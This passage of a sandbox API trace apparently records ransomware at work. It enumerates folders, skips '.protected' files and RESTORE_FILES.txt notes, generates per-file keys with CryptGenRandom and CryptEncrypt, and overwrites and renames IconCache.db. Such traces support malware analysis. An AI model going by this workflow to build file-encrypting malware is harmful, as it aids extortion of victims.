Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\..") returned 78 [0093.381] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.381] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.381] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.381] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\RESTORE_FILES.txt") returned 93 [0093.381] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.381] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.381] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.382] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.protected") returned 95 [0093.382] StrStrIW (lpFirst="state.rsm.protected", lpSrch=".protected") returned=".protected" [0093.382] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.382] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.protected") returned 102 [0093.382] StrStrIW (lpFirst="vcredist_x64.exe.protected", lpSrch=".protected") returned=".protected" [0093.382] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.382] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.382] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\RESTORE_FILES.txt") returned 93 [0093.382] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.382] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.382] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned 86 [0093.382] lstrcmpW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2=".") returned 1 [0093.382] lstrcmpW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="..") returned 1 [0093.382] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*") returned 88 [0093.382] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.382] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\.") returned 88 [0093.382] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.382] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.382] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\..") returned 89 [0093.382] lstrcmpW (lpString1="..", lpString2=".") 
returned 1 [0093.382] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.382] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.382] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages") returned 95 [0093.382] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.382] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.383] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*") returned 97 [0093.383] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.383] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\.") returned 97 [0093.383] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.383] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.383] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\..") returned 98 [0093.383] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.383] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.383] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.383] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 113 [0093.383] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.383] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.383] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.383] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64") returned 118 [0093.383] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2=".") returned 1 [0093.383] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2="..") returned 1 [0093.384] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*") returned 120 [0093.384] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.384] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\.") returned 120 [0093.384] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.384] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.384] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\..") returned 121 [0093.384] lstrcmpW (lpString1="..", lpString2=".") 
returned 1 [0093.384] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.384] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.384] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.protected") returned 137 [0093.384] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.384] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.384] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt") returned 136 [0093.384] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.384] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.384] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.384] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.protected") returned 154 [0093.384] StrStrIW (lpFirst="vc_runtimeMinimum_x64.msi.protected", lpSrch=".protected") returned=".protected" [0093.384] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.384] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.384] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt") returned 136 [0093.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.384] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.384] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.385] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 113 [0093.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.385] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.385] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\RESTORE_FILES.txt") returned 104 [0093.385] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.385] lstrcmpW (lpString1="RESTORE_FILES.txt", 
lpString2="RESTORE_FILES.txt") returned 0 [0093.385] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.385] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.385] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\RESTORE_FILES.txt") returned 104 [0093.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.386] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.386] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned 87 [0093.386] lstrcmpW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2=".") returned 1 [0093.386] lstrcmpW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="..") returned 1 [0093.387] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*") returned 89 [0093.387] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.387] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\.") returned 89 [0093.387] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.387] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.387] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\..") returned 90 [0093.387] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.387] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.387] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.387] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages") returned 96 [0093.387] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.387] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.387] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*") returned 98 [0093.387] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.388] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\.") returned 98 [0093.388] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.388] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.388] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.389] StrStrIW 
(lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.389] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.389] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.389] StrStrIW (lpFirst="vc_runtimeAdditional_x64.msi.protected", lpSrch=".protected") returned=".protected" [0093.390] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.390] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.392] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.392] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.392] StrStrIW (lpFirst="state.rsm.protected", lpSrch=".protected") returned=".protected" [0093.392] StrStrIW (lpFirst="VC_redist.x64.exe.protected", lpSrch=".protected") returned=".protected" [0093.392] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.392] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.392] StrStrIW (lpFirst="state.rsm.protected", lpSrch=".protected") returned=".protected" [0093.392] StrStrIW (lpFirst="vcredist_x86.exe.protected", lpSrch=".protected") returned=".protected" [0093.392] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.392] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.392] StrStrIW (lpFirst="state.rsm.protected", lpSrch=".protected") returned=".protected" [0093.392] StrStrIW (lpFirst="VC_redist.x86.exe.protected", lpSrch=".protected") returned=".protected" [0093.393] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.393] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.393] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.393] StrStrIW (lpFirst="RESTORE_FILES.txt", 
lpSrch=".protected") returned 0x0 [0093.393] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.393] StrStrIW (lpFirst="vc_runtimeAdditional_x86.msi.protected", lpSrch=".protected") returned=".protected" [0093.394] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.394] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.394] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.394] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.396] StrStrIW (lpFirst="jaureglist.xml.protected", lpSrch=".protected") returned=".protected" [0093.396] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.396] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.396] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.396] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.396] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.396] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.397] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.397] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.397] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0093.397] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0093.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\." 
(normalized: "c:\\users\\default\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.397] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.397] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.397] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0093.397] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0093.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\.." (normalized: "c:\\users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.398] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.398] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.398] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0093.398] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0093.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\." 
(normalized: "c:\\users\\default\\appdata\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.398] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.398] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.398] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0093.398] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0093.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.400] StrStrIW (lpFirst="IconCache.db", lpSrch=".protected") returned 0x0 [0093.400] lstrcmpW (lpString1="IconCache.db", lpString2="RESTORE_FILES.txt") returned -1 [0093.400] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0093.400] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0093.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0093.401] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db") returned 47 [0093.401] StrStrW (lpFirst="IconCache.db", lpSrch=".txt") returned 0x0 [0093.401] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db") returned 47 [0093.401] StrStrW (lpFirst="IconCache.db", lpSrch=".rar") returned 0x0 [0093.401] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db") returned 47 [0093.401] StrStrW (lpFirst="IconCache.db", lpSrch=".zip") returned 0x0 [0093.401] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0093.452] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.452] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0093.453] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.453] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0093.474] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0093.474] CloseHandle (hObject=0xd4) returned 1 [0093.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db.protected" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db.protected")) returned 1 [0093.476] FindNextFileW (in: 
